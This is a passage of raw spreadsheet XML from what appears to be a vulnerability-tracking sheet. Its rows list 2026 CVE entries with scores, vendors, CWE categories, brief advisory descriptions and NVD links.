t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1475" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t></is></c></row><row r="1476"><c r="A1476" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1476" s="5" t="inlineStr"><is><t>CVE-2026-78635</t></is></c><c r="D1476" s="5" t="n"><v>5</v></c><c r="E1476" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1476" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1476" s="5" t="inlineStr" /><c r="H1476" s="5" t="n"><v>0.002</v></c><c r="I1476" s="5" t="inlineStr" /><c r="J1476" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1476" s="5" t="inlineStr" /><c r="L1476" s="5" t="inlineStr" /><c r="M1476" s="5" t="inlineStr" /><c r="N1476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1476" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1476" s="5" t="inlineStr" /><c r="R1476" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S1476" s="5" t="inlineStr"><is><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is></c><c r="T1476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t></is></c></row><row r="1477"><c r="A1477" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1477" s="5" t="inlineStr"><is><t>CVE-2026-79904</t></is></c><c r="D1477" s="5" t="n"><v>5</v></c><c r="E1477" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1477" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1477" s="5" t="inlineStr" /><c r="H1477" s="5" t="n"><v>0.001</v></c><c r="I1477" s="5" t="inlineStr" /><c r="J1477" s="5" t="inlineStr" /><c r="K1477" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L1477" s="5" t="inlineStr" /><c r="M1477" s="5" t="inlineStr" /><c r="N1477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1477" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1477" s="5" t="inlineStr" /><c r="R1477" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1477" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79904</t></is></c></row><row r="1478"><c r="A1478" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1478" s="5" t="inlineStr"><is><t>CVE-2026-86735</t></is></c><c r="D1478" s="5" t="n"><v>5</v></c><c r="E1478" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1478" s="5" t="inlineStr" /><c r="H1478" s="5" t="n"><v>0.002</v></c><c r="I1478" s="5" t="inlineStr" /><c r="J1478" s="5" t="inlineStr" /><c r="K1478" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1478" s="5" t="inlineStr" /><c r="M1478" s="5" t="inlineStr" /><c r="N1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1478" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1478" s="5" t="inlineStr" /><c r="R1478" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1478" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.</t></is></c><c r="T1478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86735</t></is></c></row><row r="1479"><c r="A1479" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1479" s="5" t="inlineStr"><is><t>CVE-2026-22575</t></is></c><c r="D1479" s="5" t="n"><v>4.9</v></c><c r="E1479" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1479" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1479" s="5" t="inlineStr" /><c r="H1479" s="5" t="n"><v>0.002</v></c><c r="I1479" s="5" t="inlineStr" /><c r="J1479" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1479" s="5" t="inlineStr" /><c r="L1479" s="5" t="inlineStr" /><c r="M1479" s="5" t="inlineStr" /><c r="N1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1479" s="5" t="inlineStr" /><c r="R1479" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1479" s="5" t="inlineStr"><is><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is></c><c r="T1479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t></is></c></row><row r="1480"><c r="A1480" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1480" s="5" t="inlineStr"><is><t>CVE-2026-68785</t></is></c><c r="D1480" s="5" t="n"><v>4.9</v></c><c r="E1480" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1480" s="5" t="inlineStr" /><c r="H1480" s="5" t="n"><v>0.008</v></c><c r="I1480" s="5" t="inlineStr" /><c r="J1480" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1480" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1480" s="5" t="inlineStr" /><c r="M1480" s="5" t="inlineStr" /><c r="N1480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1480" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1480" s="5" t="inlineStr" /><c r="R1480" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1480" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T1480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t></is></c></row><row r="1481"><c r="A1481" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1481" s="5" t="inlineStr"><is><t>CVE-2026-78624</t></is></c><c r="D1481" s="5" t="n"><v>4.9</v></c><c r="E1481" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1481" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1481" s="5" t="inlineStr" /><c r="H1481" s="5" t="n"><v>0.004</v></c><c r="I1481" s="5" t="inlineStr" /><c r="J1481" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1481" s="5" t="inlineStr" /><c r="L1481" s="5" t="inlineStr" /><c r="M1481" s="5" t="inlineStr" /><c r="N1481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1481" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1481" s="5" t="inlineStr" /><c r="R1481" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1481" s="5" t="inlineStr"><is><t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t></is></c><c r="T1481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t></is></c></row><row r="1482"><c r="A1482" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1482" s="5" t="inlineStr"><is><t>CVE-2026-86085</t></is></c><c r="D1482" s="5" t="n"><v>4.9</v></c><c r="E1482" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1482" s="5" t="inlineStr" /><c r="H1482" s="5" t="n"><v>0.003</v></c><c r="I1482" s="5" t="inlineStr" /><c r="J1482" s="5" t="inlineStr" /><c r="K1482" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1482" s="5" t="inlineStr" /><c r="M1482" s="5" t="inlineStr" /><c r="N1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1482" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1482" s="5" t="inlineStr" /><c r="R1482" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1482" s="5" t="inlineStr"><is><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is></c><c r="T1482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86085</t></is></c></row><row r="1483"><c r="A1483" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1483" s="5" t="inlineStr"><is><t>CVE-2026-86993</t></is></c><c r="D1483" s="5" t="n"><v>4.9</v></c><c r="E1483" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1483" s="5" t="inlineStr" /><c r="H1483" s="5" t="n"><v>0.003</v></c><c r="I1483" s="5" t="inlineStr" /><c r="J1483" s="5" t="inlineStr" /><c r="K1483" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1483" s="5" t="inlineStr" /><c r="M1483" s="5" t="inlineStr" /><c r="N1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1483" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1483" s="5" t="inlineStr" /><c r="R1483" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1483" s="5" t="inlineStr"><is><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is></c><c r="T1483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86993</t></is></c></row><row r="1484"><c r="A1484" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1484" s="5" t="inlineStr"><is><t>CVE-2026-69474</t></is></c><c r="D1484" s="5" t="n"><v>4.8</v></c><c r="E1484" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1484" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1484" s="5" t="inlineStr" /><c r="H1484" s="5" t="n"><v>0.007</v></c><c r="I1484" s="5" t="inlineStr" /><c r="J1484" s="5" t="inlineStr" /><c r="K1484" s="5" t="inlineStr" /><c r="L1484" s="5" t="inlineStr" /><c r="M1484" s="5" t="inlineStr" /><c r="N1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1484" s="5" t="inlineStr" /><c r="R1484" s="5" t="inlineStr"><is><t>CWE-126, CWE-416</t></is></c><c r="S1484" s="5" t="inlineStr"><is><t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t></is></c></row><row r="1485"><c r="A1485" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1485" s="5" t="inlineStr"><is><t>CVE-2026-69615</t></is></c><c r="D1485" s="5" t="n"><v>4.8</v></c><c r="E1485" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1485" s="5" t="inlineStr" /><c r="H1485" s="5" t="n"><v>0.004</v></c><c r="I1485" s="5" t="inlineStr" /><c r="J1485" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1485" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1485" s="5" t="inlineStr" /><c r="M1485" s="5" t="inlineStr" /><c r="N1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1485" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1485" s="5" t="inlineStr" /><c r="R1485" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1485" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t></is></c></row><row r="1486"><c r="A1486" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1486" s="5" t="inlineStr"><is><t>CVE-2026-78560</t></is></c><c r="D1486" s="5" t="n"><v>4.8</v></c><c r="E1486" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1486" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1486" s="5" t="inlineStr" /><c r="H1486" s="5" t="n"><v>0.002</v></c><c r="I1486" s="5" t="inlineStr" /><c r="J1486" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1486" s="5" t="inlineStr" /><c r="L1486" s="5" t="inlineStr" /><c r="M1486" s="5" t="inlineStr" /><c r="N1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1486" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1486" s="5" t="inlineStr" /><c r="R1486" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1486" s="5" t="inlineStr"><is><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is></c><c r="T1486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t></is></c></row><row r="1487"><c r="A1487" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1487" s="5" t="inlineStr"><is><t>CVE-2026-68849</t></is></c><c r="D1487" s="5" t="n"><v>4.7</v></c><c r="E1487" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1487" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1487" s="5" t="inlineStr" /><c r="H1487" s="5" t="n"><v>0.002</v></c><c r="I1487" s="5" t="inlineStr" /><c r="J1487" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1487" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1487" s="5" t="inlineStr" /><c r="M1487" s="5" t="inlineStr" /><c r="N1487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1487" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1487" s="5" t="inlineStr" /><c r="R1487" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1487" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1487" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t></is></c></row><row r="1488"><c r="A1488" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1488" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1488" s="5" t="inlineStr"><is><t>CVE-2026-68891</t></is></c><c r="D1488" s="5" t="n"><v>4.7</v></c><c r="E1488" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1488" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1488" s="5" t="inlineStr" /><c r="H1488" s="5" t="n"><v>0.002</v></c><c r="I1488" s="5" t="inlineStr" /><c r="J1488" s="5" t="inlineStr" /><c r="K1488" s="5" t="inlineStr" /><c r="L1488" s="5" t="inlineStr" /><c r="M1488" s="5" t="inlineStr" /><c r="N1488" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1488" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1488" s="5" t="inlineStr" /><c r="R1488" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1488" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1488" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t></is></c></row><row r="1489"><c r="A1489" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1489" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1489" s="5" t="inlineStr"><is><t>CVE-2026-69316</t></is></c><c r="D1489" s="5" t="n"><v>4.7</v></c><c r="E1489" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1489" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1489" s="5" t="inlineStr" /><c r="H1489" s="5" t="n"><v>0.003</v></c><c r="I1489" s="5" t="inlineStr" /><c r="J1489" s="5" t="inlineStr" /><c r="K1489" s="5" t="inlineStr" /><c r="L1489" s="5" t="inlineStr" /><c r="M1489" s="5" t="inlineStr" /><c r="N1489" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1489" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1489" s="5" t="inlineStr" /><c r="R1489" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1489" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1489" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t></is></c></row><row r="1490"><c r="A1490" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1490" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1490" s="5" t="inlineStr"><is><t>CVE-2026-69425</t></is></c><c r="D1490" s="5" t="n"><v>4.7</v></c><c r="E1490" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1490" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1490" s="5" t="inlineStr" /><c r="H1490" s="5" t="n"><v>0.003</v></c><c r="I1490" s="5" t="inlineStr" /><c r="J1490" s="5" t="inlineStr" /><c r="K1490" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1490" s="5" t="inlineStr" /><c r="M1490" s="5" t="inlineStr" /><c r="N1490" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1490" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1490" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1490" s="5" t="inlineStr" /><c r="R1490" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1490" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1490" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t></is></c></row><row r="1491"><c r="A1491" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1491" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1491" s="5" t="inlineStr"><is><t>CVE-2026-69483</t></is></c><c r="D1491" s="5" t="n"><v>4.7</v></c><c r="E1491" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1491" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1491" s="5" t="inlineStr" /><c r="H1491" s="5" t="n"><v>0.003</v></c><c r="I1491" s="5" t="inlineStr" /><c r="J1491" s="5" t="inlineStr" /><c r="K1491" s="5" t="inlineStr" /><c r="L1491" s="5" t="inlineStr" /><c r="M1491" s="5" t="inlineStr" /><c r="N1491" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1491" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1491" s="5" t="inlineStr" /><c r="R1491" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1491" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t></is></c><c r="T1491" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t></is></c></row><row r="1492"><c r="A1492" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1492" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1492" s="5" t="inlineStr"><is><t>CVE-2026-69771</t></is></c><c r="D1492" s="5" t="n"><v>4.7</v></c><c r="E1492" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1492" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1492" s="5" t="inlineStr" /><c r="H1492" s="5" t="n"><v>0.003</v></c><c r="I1492" s="5" t="inlineStr" /><c r="J1492" s="5" t="inlineStr" /><c r="K1492" s="5" t="inlineStr" /><c r="L1492" s="5" t="inlineStr" /><c r="M1492" s="5" t="inlineStr" /><c r="N1492" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1492" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1492" s="5" t="inlineStr" /><c r="R1492" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="S1492" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1492" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t></is></c></row><row r="1493"><c r="A1493" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1493" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1493" s="5" t="inlineStr"><is><t>CVE-2026-69792</t></is></c><c r="D1493" s="5" t="n"><v>4.7</v></c><c r="E1493" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1493" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1493" s="5" t="inlineStr" /><c r="H1493" s="5" t="n"><v>0.002</v></c><c r="I1493" s="5" t="inlineStr" /><c r="J1493" s="5" t="inlineStr" /><c r="K1493" s="5" t="inlineStr" /><c r="L1493" s="5" t="inlineStr" /><c r="M1493" s="5" t="inlineStr" /><c r="N1493" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1493" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1493" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1493" s="5" t="inlineStr" /><c r="R1493" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S1493" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1493" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t></is></c></row><row r="1494"><c r="A1494" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1494" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1494" s="5" t="inlineStr"><is><t>CVE-2026-69832</t></is></c><c r="D1494" s="5" t="n"><v>4.7</v></c><c r="E1494" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1494" s="5" t="inlineStr" /><c r="H1494" s="5" t="n"><v>0.004</v></c><c r="I1494" s="5" t="inlineStr" /><c r="J1494" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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4" s="5" t="inlineStr" /><c r="M1494" s="5" t="inlineStr" /><c r="N1494" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1494" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1494" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1494" s="5" t="inlineStr" /><c r="R1494" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1494" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1494" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t></is></c></row><row r="1495"><c r="A1495" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1495" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1495" s="5" t="inlineStr"><is><t>CVE-2026-69853</t></is></c><c r="D1495" s="5" t="n"><v>4.7</v></c><c r="E1495" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1495" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1495" s="5" t="inlineStr" /><c r="H1495" s="5" t="n"><v>0.003</v></c><c r="I1495" s="5" t="inlineStr" /><c r="J1495" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K14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5" s="5" t="inlineStr" /><c r="M1495" s="5" t="inlineStr" /><c r="N1495" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1495" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1495" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1495" s="5" t="inlineStr" /><c r="R1495" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1495" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1495" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t></is></c></row><row r="1496"><c r="A1496" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1496" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1496" s="5" t="inlineStr"><is><t>CVE-2026-69895</t></is></c><c r="D1496" s="5" t="n"><v>4.7</v></c><c r="E1496" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1496" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1496" s="5" t="inlineStr" /><c r="H1496" s="5" t="n"><v>0.003</v></c><c r="I1496" s="5" t="inlineStr" /><c r="J1496" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K149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6" s="5" t="inlineStr" /><c r="M1496" s="5" t="inlineStr" /><c r="N1496" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1496" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1496" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1496" s="5" t="inlineStr" /><c r="R1496" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1496" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1496" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t></is></c></row><row r="1497"><c r="A1497" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1497" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1497" s="5" t="inlineStr"><is><t>CVE-2026-72931</t></is></c><c r="D1497" s="5" t="n"><v>4.7</v></c><c r="E1497" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1497" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1497" s="5" t="inlineStr" /><c 